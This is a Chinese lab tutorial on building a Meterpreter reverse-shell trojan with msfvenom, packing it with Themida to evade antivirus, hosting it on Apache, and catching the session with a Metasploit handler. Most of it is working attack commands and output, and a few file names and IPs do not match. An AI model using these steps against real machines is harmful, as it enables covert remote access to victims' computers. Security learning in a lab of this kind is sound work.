本文章仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。
环境准备:
名称 | 系统 | 位数 | IP |
攻击机 | Kali Linux | 64 | 10.3.0.231 |
客户端 | Windows 7 | 64 | 10.3.0.234 |
一、生成木马
1、在Kali机器上面生成木马,注意这里是64位的木马
msfvenom -p windows/x64/meterpreter/reverse_tcp -b '\x00\x0b' -f exe lhost=10.3.0.231 lport=9999 -o /var/www/html/shellx64.exe
2、启动Apache,方便客户端下载
service apache2 start
3、免杀加壳:本例用的是 Themida
二、Kali 开启监听
1、开启MSF
┌──(root㉿Kali)-[~]
└─# msfconsole
2、使用监听模块
msf6 > use exploit/multi/handler
# 输出
[*] Using configured payload generic/shell_reverse_tcp
2、设置Payload
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
# 输出
payload => windows/x64/meterpreter/reverse_tcp
3、设置监听IP
msf6 exploit(multi/handler) > set lhost 10.3.0.231
# 输出
lhost => 10.3.0.231
4、设置监听端口
msf6 exploit(multi/handler) > set lport 9999
# 输出
lport => 9999
5、运行
msf6 exploit(multi/handler) > run
# 输出
[*] Started reverse TCP handler on 10.3.0.231:9999
三、客户端运行
1、模拟下载木马
http://10.3.0.231/shell.exe
2、点击运行木马
四、获取权限
1、当出现 meterpreter,表示成功入侵
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.3.0.231:9999
[*] Sending stage (175686 bytes) to 10.3.0.227
[*] Meterpreter session 1 opened (10.3.0.231:9999 -> 10.3.0.227:58484) at 2024-03-13 14:02:01 +0800
meterpreter >
2、查看权限,当客户机是普通用户登录的话,此时获取到的就是一个普通 user 权限
meterpreter > getuid
# 输出
Server username: tomma-PC\tomma